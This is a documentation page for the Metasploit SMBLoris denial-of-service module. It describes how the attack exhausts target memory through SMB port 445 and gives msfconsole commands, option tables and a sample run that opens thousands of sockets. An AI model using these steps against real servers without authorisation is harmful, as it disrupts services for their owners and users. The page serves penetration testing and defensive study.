SMBLoris NBSS Denial of Service - Metasploit
This page contains detailed information about how to use the auxiliary/dos/smb/smb_loris metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SMBLoris NBSS Denial of Service
Module: auxiliary/dos/smb/smb_loris
Source code: modules/auxiliary/dos/smb/smb_loris.rb
Disclosure date: 2017-06-29
Last modification time: 2020-02-25 19:59:27 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 445
List of CVEs: -
The SMBLoris attack consumes large chunks of memory in the target by sending SMB requests with the NetBios Session Service(NBSS) Length Header value set to the maximum possible value. By keeping these connections open and initiating large numbers of these sessions, the memory does not get freed, and the server grinds to a halt. This vulnerability was originally disclosed by Sean Dillon and Zach Harding. DISCALIMER: This module opens a lot of simultaneous connections. Please check your system's ULIMIT to make sure it can handle it. This module will also run continuously until stopped.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > show targets
... a list of targets ...
msf auxiliary(smb_loris) > set TARGET target-id
msf auxiliary(smb_loris) > show options
... show and set options ...
msf auxiliary(smb_loris) > exploit
Required Options
- rhost: The target address
Knowledge Base
Vulnerable Application
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB. Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable. See the SMBLoris page for details on the vulnerability.
The module opens over 64,000 connections to the target service, so please make sure your system ULIMIT is set appropriately to handle it. A single host running this module can theoretically consume up to 8GB of memory on the target.
Verification Steps
- Start msfconsole
- Do:
use auxiliary/dos/smb/smb_loris - Do:
set rhost [IP] - Do:
run - Target should allocate increasing amounts of memory.
Scenarios
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >
msf auxiliary(smb_loris) > run
[*] Starting server...
[*] 192.168.172.138:445 - 100 socket(s) open
[*] 192.168.172.138:445 - 200 socket(s) open
...
[!] 192.168.172.138:445 - At open socket limit with 4000 sockets open. Try increasing you system limits.
[*] 192.168.172.138:445 - Holding steady at 4000 socket(s) open
...
Go back to menu.
Msfconsole Usage
Here is how the dos/smb/smb_loris auxiliary module looks in the msfconsole:
msf6 > use auxiliary/dos/smb/smb_loris
msf6 auxiliary(dos/smb/smb_loris) > show info
Name: SMBLoris NBSS Denial of Service
Module: auxiliary/dos/smb/smb_loris
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-06-29
Provided by:
thelightcosine
Adam Cammack <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
rhost yes The target address
rport 445 yes SMB port on the target
Description:
The SMBLoris attack consumes large chunks of memory in the target by
sending SMB requests with the NetBios Session Service(NBSS) Length
Header value set to the maximum possible value. By keeping these
connections open and initiating large numbers of these sessions, the
memory does not get freed, and the server grinds to a halt. This
vulnerability was originally disclosed by Sean Dillon and Zach
Harding. DISCALIMER: This module opens a lot of simultaneous
connections. Please check your system's ULIMIT to make sure it can
handle it. This module will also run continuously until stopped.
References:
http://smbloris.com/
Module Options
This is a complete list of options available in the dos/smb/smb_loris auxiliary module:
msf6 auxiliary(dos/smb/smb_loris) > show options
Module options (auxiliary/dos/smb/smb_loris):
Name Current Setting Required Description
---- --------------- -------- -----------
rhost yes The target address
rport 445 yes SMB port on the target
Advanced Options
Here is a complete list of advanced options supported by the dos/smb/smb_loris auxiliary module:
msf6 auxiliary(dos/smb/smb_loris) > show advanced
Module advanced options (auxiliary/dos/smb/smb_loris):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the dos/smb/smb_loris module can do:
msf6 auxiliary(dos/smb/smb_loris) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the dos/smb/smb_loris auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(dos/smb/smb_loris) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Exception sending packet: <E.MESSAGE>
Here is a relevant code snippet related to the "Exception sending packet: <E.MESSAGE>" error message:
83: rescue Errno::EMFILE
84: Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing your system limits.", level: 'warning' unless warned
85: warned = true
86: sockets.slice(0).close
87: rescue Exception => e
88: Metasploit.log "Exception sending packet: #{e.message}", level: 'error'
89: end
90: end
91: end
92:
93: if __FILE__ == $PROGRAM_NAME
Go back to menu.
Related Pull Requests
- #12992 Merged Pull Request: Fix for a simple typo.
- #9748 Merged Pull Request: Externalize SMBLoris
- #8796 Merged Pull Request: SMBLoris Denial of Service Module
References
See Also
Check also the following modules related to this module:
- auxiliary/fuzzers/smb/smb_create_pipe
- auxiliary/fuzzers/smb/smb_create_pipe_corrupt
- auxiliary/fuzzers/smb/smb_negotiate_corrupt
- auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
- auxiliary/fuzzers/smb/smb_tree_connect
- auxiliary/fuzzers/smb/smb_tree_connect_corrupt
- auxiliary/scanner/smb/smb_enum_gpp
- auxiliary/scanner/smb/smb_enumshares
- auxiliary/scanner/smb/smb_enumusers
- auxiliary/scanner/smb/smb_enumusers_domain
- auxiliary/scanner/smb/smb_login
- auxiliary/scanner/smb/smb_lookupsid
- auxiliary/scanner/smb/smb_ms17_010
- auxiliary/scanner/smb/smb_uninit_cred
- auxiliary/scanner/smb/smb_version
- exploit/windows/smb/smb_delivery
- exploit/windows/smb/smb_doublepulsar_rce
- exploit/windows/smb/smb_relay
- exploit/windows/smb/smb_rras_erraticgopher
- exploit/windows/smb/smb_shadow
- post/linux/busybox/smb_share_root
- auxiliary/dos/windows/smb/ms05_047_pnp
- auxiliary/dos/windows/smb/ms06_035_mailslot
- auxiliary/dos/windows/smb/ms06_063_trans
- auxiliary/dos/windows/smb/ms09_001_write
- auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
- auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff
- auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
- auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
- auxiliary/dos/windows/smb/ms11_019_electbowser
- auxiliary/dos/windows/smb/rras_vls_null_deref
- auxiliary/dos/windows/smb/vista_negotiate_stop
- auxiliary/dos/http/slowloris
Authors
- thelightcosine
- Adam Cammack <adam_cammack[at]rapid7.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
